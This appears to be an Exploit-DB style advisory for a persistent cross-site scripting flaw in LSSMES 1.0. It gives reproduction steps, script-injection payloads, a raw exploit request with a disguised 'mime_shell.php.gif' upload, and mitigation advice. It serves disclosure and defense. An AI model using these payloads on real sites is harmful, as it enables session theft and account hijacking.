Local Services Search Engine Management System (LSSMES) 1.0 - 'name' Persistent Cross-Site Scripting (XSS)

vendor:

Local Services Search Engine Management System (LSSMES)

by:

Tushar Vaidya

8.8

CVSS

HIGH

Persistent Cross-Site Scripting (XSS)

CWE

Product Name: Local Services Search Engine Management System (LSSMES)

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:phpgurukul:local_services_search_engine_management_system_using_php_and_mysql

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Ubuntu

2021

Local Services Search Engine Management System (LSSMES) 1.0 – ‘name’ Persistent Cross-Site Scripting (XSS)

A persistent cross-site scripting (XSS) vulnerability exists in Local Services Search Engine Management System (LSSMES) 1.0, which allows an attacker to inject malicious JavaScript code into the application. An attacker can exploit this vulnerability by sending a specially crafted request to the application. The malicious code will be executed in the browser of the victim when the vulnerable page is accessed. This can be used to steal session cookies, hijack user accounts, and perform other malicious activities.

Mitigation:

The application should validate user input and encode output to prevent XSS attacks. The application should also use a Content Security Policy (CSP) to prevent malicious code from being executed.

Source

Exploit-DB raw data:

# Exploit Title: Local Services Search Engine Management System (LSSMES) 1.0 - 'name' Persistent Cross-Site Scripting (XSS)
# Date: 2021-03-03
# Exploit Author: Tushar Vaidya
# Vendor Homepage: https://phpgurukul.com/local-services-search-engine-management-system-using-php-and-mysql/
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10867
# Version: v1.0
# Tested on: Ubuntu

*Steps to Reproduce:*
1) Login with Admin Credentials and click on the *Person List* button.
2) Click on the *Add Person* button.
3) Now add the 'Ba1man' in the input field of *Name* and 'Ba2man' in the input field of *Address *then intercept it with Burp Suite.
4) Now add the following payload input field of *Name  & Address*.

Payload 1:  ba1man"></td><script>alert(document.cookie)</script>
Payload 2:  ba2man"></td><script>alert(document.URL)</script>

4) Click On Add
5) Now go to http://localhost/LSSMES/lssems/view-category-detail.php?viewid=3
6) XSS payload is triggered.
7) Secondly, go to http://localhost/LSSMES/lssems/single-person-detail.php?viewid=25
8) Again XSS  payload is triggered

*Proof-of-concept:*
1) Vulnerable Form Request:

POST /LSSMES/lssems/admin/add-person.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:86.0) Gecko/20100101
Firefox/86.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;
boundary=---------------------------366892106534365372313887502624
Content-Length: 1110
Origin: http:// localhost
Connection: close
Referer: http:// localhost /LSSMES/lssems/admin/add-person.php
Cookie: PHPSESSID=rinoskt58u1hpa8s6i7di53rbc
Upgrade-Insecure-Requests: 1
-----------------------------366892106534365372313887502624
Content-Disposition: form-data; name="category"
3
-----------------------------366892106534365372313887502624
Content-Disposition: form-data; name="name"

*ba1man"></td><script>alert(document.cookie)</script>*

-----------------------------366892106534365372313887502624
Content-Disposition: form-data; name="propic"; filename="mime_shell.php.gif"
Content-Type: image/gif
GIF8;
-----------------------------366892106534365372313887502624
Content-Disposition: form-data; name="mobilenumber"
8524697125
-----------------------------366892106534365372313887502624
Content-Disposition: form-data; name="address"

*ba1man"></td><script>alert(document.URL)</script>*

-----------------------------366892106534365372313887502624
Content-Disposition: form-data; name="city"

-----------------------------366892106534365372313887502624
Content-Disposition: form-data; name="submit"
-----------------------------366892106534365372313887502624--


2.1) Response:
Go to http://localhost/LSSMES/lssems/view-category-detail.php?viewid=3
Note: XSS from name parameter


2.2) Response:
Go to http://localhost/LSSMES/lssems/single-person-detail.php?viewid=25
Note: XSS from address parameter